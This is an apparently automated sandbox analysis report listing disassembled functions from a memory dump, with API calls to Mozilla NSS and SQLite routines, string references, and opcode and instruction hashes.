Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: f43f7779ce20d610674eecb81d6d5d7790f4a27619d3dae9122026f2cd317c96
Instruction ID: 117d2f3c65b29898456e21663fcd6e1de240bc135b30f18fc3b54df60e399fb0
Opcode Fuzzy Hash: f43f7779ce20d610674eecb81d6d5d7790f4a27619d3dae9122026f2cd317c96
Instruction Fuzzy Hash: A302EFB1B043004BE7149F719A8A72B36B2BBC560CF54893CD85A87B41EF75E95AC7C2

Function 6C7AEA00 Relevance: 28.8, APIs: 19, Instructions: 304COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6C7B8C9F,00000000,00000000,?), ref: 6C7AEA29

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,000000A0,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6C7B8C9F), ref: 6C7AEB01
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,6C89C6C4), ref: 6C7AEB28
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C7AEBC6
SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C7AEBDE
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7AEBEB
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000010,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6C7B8C9F), ref: 6C7AEC17
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7AEC2F
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C7AEC4B
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,6C89C754), ref: 6C7AEC6D
free.MOZGLUE(?), ref: 6C7AEC7F
free.MOZGLUE(00000000), ref: 6C7AEC90
free.MOZGLUE(?), ref: 6C7AECA1
free.MOZGLUE(00000000), ref: 6C7AECBF
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7AECD4
SECOID_CopyAlgorithmID_Util.NSS3(?,?,00000000), ref: 6C7B91D5
SECITEM_ZfreeItem_Util.NSS3(-0000000C,00000000), ref: 6C7B91E8
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C7B91F2
free.MOZGLUE(00000000), ref: 6C7B91FB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Encode$Item_free$Integer_Unsigned$Zfree$Algorithm$CopyErrorFindTag_
String ID:
API String ID: 899953378-0
Opcode ID: d362832a5ca1e8e2db6004042d5b9176c8c5a624da1220d415f3c4ea48f5f1c2
Instruction ID: d5df29a7b578f37b9909cc022475f003a3725aa58636dc037b4fd58a54f5ed75
Opcode Fuzzy Hash: d362832a5ca1e8e2db6004042d5b9176c8c5a624da1220d415f3c4ea48f5f1c2
Instruction Fuzzy Hash: A1A1EAB1A011095BEB10CAE9CE88FBE7368EB45348F104539E816D7B81E625D966C7D3

Function 6C7EC8C0 Relevance: 25.9, APIs: 17, Instructions: 432COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7ECA51
TlsGetValue.KERNEL32 ref: 6C7ECAE8
EnterCriticalSection.KERNEL32(?), ref: 6C7ECAFC
PK11_FreeSymKey.NSS3(00000000), ref: 6C7ECB2E
PK11_KeyGen.NSS3(?,?,00000000,00000000,?), ref: 6C7ECB87
memset.VCRUNTIME140(?,00000000,00000410), ref: 6C7ECBA8
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C7ECCCD
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7ECCE1
PK11_PubDeriveWithKDF.NSS3 ref: 6C7ECD3D
memcpy.VCRUNTIME140(?,?,?), ref: 6C7ECD73
memcpy.VCRUNTIME140(?,?,?), ref: 6C7ECD9D
PK11_WrapSymKey.NSS3(?,00000000,?,00000000,?), ref: 6C7ECDDA
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C7ECE04
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C7ECE17
PK11_FreeSymKey.NSS3(00000000), ref: 6C7ECE24
PR_Unlock.NSS3 ref: 6C7ECE49
PK11_FreeSymKey.NSS3(00000000), ref: 6C7ECE96

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$ErrorFree$Destroymemcpy$CriticalDeriveEnterPrivatePublicSectionUnlockValueWithWrapmemset
String ID:
API String ID: 3685077037-0
Opcode ID: 397916a65c94c5064d4a40bfcd1f9954fa69726c614acf05020289f4fcc35a90
Instruction ID: 3b8793cc9ec1d06abbf401e3e00fc168b29abce41c07ffb27994d78f0be0f031
Opcode Fuzzy Hash: 397916a65c94c5064d4a40bfcd1f9954fa69726c614acf05020289f4fcc35a90
Instruction Fuzzy Hash: 3AF1D7BAD002248BEB10EF18CE8579A7BB4FF49309F1444B9D90997B41E734DE94CB95

Function 6C7A0BA0 Relevance: 25.7, APIs: 17, Instructions: 242memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE0B3,00000000), ref: 6C7A0BFA

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7A0C18
PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6C7A0C2E
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C7A0C39
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C7A0C45
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7A0CC1
PORT_Alloc_Util.NSS3(?), ref: 6C7A0CDA
memcpy.VCRUNTIME140(?,?,?), ref: 6C7A0D1B
PK11_GenerateKeyPairWithOpFlags.NSS3 ref: 6C7A0D79
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7A0DB2
PK11_CreateContextBySymKey.NSS3(?,82000104,?,?), ref: 6C7A0DE4
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7A0DFE
PR_SetError.NSS3(FFFFE064,00000000), ref: 6C7A0E2C
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C7A0E38
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C7A0E44
free.MOZGLUE(?), ref: 6C7A0E7E
free.MOZGLUE(?), ref: 6C7A0EAE

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DestroyError$K11_$ContextPrivatePublicUtilfree$Alloc_CreateFindFlagsGeneratePairTag_ValueWithmemcpy
String ID:
API String ID: 2510822978-0
Opcode ID: 7b329d535b9668ae7228a5016d482de0d3c50359ba0dccc2dd545c0d3874719c
Instruction ID: 9432e4f8bef55d8f0a4caf605009a21f16ff42910515a689fb1d300156083cbe
Opcode Fuzzy Hash: 7b329d535b9668ae7228a5016d482de0d3c50359ba0dccc2dd545c0d3874719c
Instruction Fuzzy Hash: C091E4B1908340AFD7109F68DE4974BBBE4AF84708F148A3CF89A97B51E730D945CB92

Function 6C76EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76EF63

Part of subcall function 6C7787D0: PORT_NewArena_Util.NSS3(00000800,6C76EF74,00000000), ref: 6C7787E8
Part of subcall function 6C7787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C76EF74,00000000), ref: 6C7787FD
Part of subcall function 6C7787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C77884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C76F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C76F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C76F374
PL_strcasecmp.NSS3(6C8B2FD4,?), ref: 6C76F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C76F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C76F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C76F67D
CERT_DestroyName.NSS3(?), ref: 6C76F68B

Part of subcall function 6C778320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C778338
Part of subcall function 6C778320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C778364
Part of subcall function 6C778320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C77838E
Part of subcall function 6C778320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7783A5
Part of subcall function 6C778320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7783E3

Part of subcall function 6C7784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C7784D9
Part of subcall function 6C7784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C778528

Part of subcall function 6C778900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?,00000000), ref: 6C778955

Strings

", xrefs: 6C76F21B
*, xrefs: 6C76F3C6
oid., xrefs: 6C76F2CF

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: 6ffeabcbd96bde21999d43d5b794f0b86d47114f91c7c76f0446a1fbcf55461a
Instruction ID: bd725fc96599827d6cba9b5920d9647394b0953191b786459675dedd800f91d4
Opcode Fuzzy Hash: 6ffeabcbd96bde21999d43d5b794f0b86d47114f91c7c76f0446a1fbcf55461a
Instruction Fuzzy Hash: A62219716083414FD714CE2ACA9076AB7E6AB85358F184A3EECD587F92E7319C05CB93

Function 6C7DEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7DDAE2,?), ref: 6C7DC6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7DF0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7DF0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C7DF101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7DF11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C8A218C), ref: 6C7DF183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C7DF19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7DF1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C7DF1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C7DF210

Part of subcall function 6C7852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C7DF1E9,?,00000000,?,?), ref: 6C7852F5
Part of subcall function 6C7852D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C78530F
Part of subcall function 6C7852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C785326
Part of subcall function 6C7852D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C7DF1E9,?,00000000,?,?), ref: 6C785340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7DF227

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C7DF23E

Part of subcall function 6C7CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C77E708,00000000,00000000,00000004,00000000), ref: 6C7CBE6A
Part of subcall function 6C7CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7804DC,?), ref: 6C7CBE7E
Part of subcall function 6C7CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C7CBEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7DF2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7DF3A8

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C7DF3B3

Part of subcall function 6C782D20: PK11_DestroyObject.NSS3(?,?), ref: 6C782D3C
Part of subcall function 6C782D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C782D5F

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 501d511a2c935fba8dd8edf7337a92a3112fe19bb0fb5216ef823cb2b55476df
Instruction ID: 69ca2957c3304f1cf8d621525a5f00eb6328e6a21ea3fe3ce06c77e5df175ef1
Opcode Fuzzy Hash: 501d511a2c935fba8dd8edf7337a92a3112fe19bb0fb5216ef823cb2b55476df
Instruction Fuzzy Hash: AED15EB6E016059FEB14CFA9DA84A9EB7F5EF48308F1A8039D915A7711E731F805CB50

Function 6C7BA9A0 Relevance: 21.2, APIs: 14, Instructions: 214COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C7BA9CA

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6C8D0B04,?), ref: 6C7BA9F7

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C7BAA0B
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7BAA33
PK11_GetInternalKeySlot.NSS3 ref: 6C7BAA55
PK11_Authenticate.NSS3(00000000,00000001,?), ref: 6C7BAA69
PORT_FreeArena_Util.NSS3(00000001,00000001), ref: 6C7BAAD4
PK11_ListFixedKeysInSlot.NSS3(?,00000000,?), ref: 6C7BAB18
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7BAB5A
PK11_FreeSymKey.NSS3(00000000), ref: 6C7BAB85
PK11_FreeSymKey.NSS3(00000000), ref: 6C7BAB99
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C7BABDC
PK11_FreeSymKey.NSS3(?), ref: 6C7BABE9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7BABF7

Part of subcall function 6C7BAC10: PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C7BAB3E,?,?,?), ref: 6C7BAC35
Part of subcall function 6C7BAC10: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C7BAB3E,?,?,?), ref: 6C7BAC55
Part of subcall function 6C7BAC10: PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C7BAB3E,?,?), ref: 6C7BAC70
Part of subcall function 6C7BAC10: PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C7BAC92
Part of subcall function 6C7BAC10: PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7BAB3E), ref: 6C7BACD7

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$Util$Free$Arena_Item_$Zfree$ArenaContextSlot$Alloc_AuthenticateBlockCipherCreateDecodeDestroyErrorFixedInitInternalKeysListLockPoolQuickSizecalloc
String ID:
API String ID: 2602994911-0
Opcode ID: ef6272026bf146708989440188ee6962da4cc88cb6767153711e87549408c098
Instruction ID: 7605cd8f0d5d177eb1a5e6384aefd991a6e9205b8750b492b3335233873694c1
Opcode Fuzzy Hash: ef6272026bf146708989440188ee6962da4cc88cb6767153711e87549408c098
Instruction Fuzzy Hash: 37711572A04301ABD711EF68DE45B5BB3A5BF84368F104A39FC64A7740FB31D9488792

Function 6C6FECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6FED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6FEE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6FEF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C6FEF98

Strings

database corruption, xrefs: 6C6FF48D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6FF483
%s at line %d of [%.10s], xrefs: 6C6FF492

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: a30b69d882eed7191bafa3ed60cb5ccfae66eb7cd8a2db8ebd294ca7875f1d99
Instruction ID: 0bbef9ad1e11d9eca32513bc49ffabdc85b5b9bf6e4b944088ff0a93152af5ad
Opcode Fuzzy Hash: a30b69d882eed7191bafa3ed60cb5ccfae66eb7cd8a2db8ebd294ca7875f1d99
Instruction Fuzzy Hash: 13623470A042458FDB14CF68C484B9ABBF3BF45318F1841A8D8655BB92D735E887CBDA

Function 6C7A0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C7A0F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7A0FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C7A1006
PK11_FreeSymKey.NSS3(?), ref: 6C7A101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7A1033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7A103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C7A1048
memcpy.VCRUNTIME140(?,?,?), ref: 6C7A108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7A10BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C7A10D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C7A112E

Part of subcall function 6C7A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C7A08C4,?,?), ref: 6C7A15B8
Part of subcall function 6C7A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C7A08C4,?,?), ref: 6C7A15C1
Part of subcall function 6C7A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A162E
Part of subcall function 6C7A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A1637

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 800eac017df7b5578c5618e243948afce98fe04ed16e473711d7e53ec1296b69
Instruction ID: 648cf5e0dc039e84ab95eae6494ed58bcec0cc0c7b35c3f818ab6970a461ecd8
Opcode Fuzzy Hash: 800eac017df7b5578c5618e243948afce98fe04ed16e473711d7e53ec1296b69
Instruction Fuzzy Hash: BA71C275A00205CFEB04CFAACA84A6BB7B5BF48318F14863CE51997711E771D946CB81

Function 6C7C6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C771C6F,00000000,00000004,?,?), ref: 6C7C6C3F

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C771C6F,00000000,00000004,?,?), ref: 6C7C6C60
PR_ExplodeTime.NSS3(00000000,6C771C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C771C6F,00000000,00000004,?,?), ref: 6C7C6C94

Strings

gfff, xrefs: 6C7C6D30
gfff, xrefs: 6C7C6CFD
gfff, xrefs: 6C7C6D66
gfff, xrefs: 6C7C6D9C
gfff, xrefs: 6C7C6CF5

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
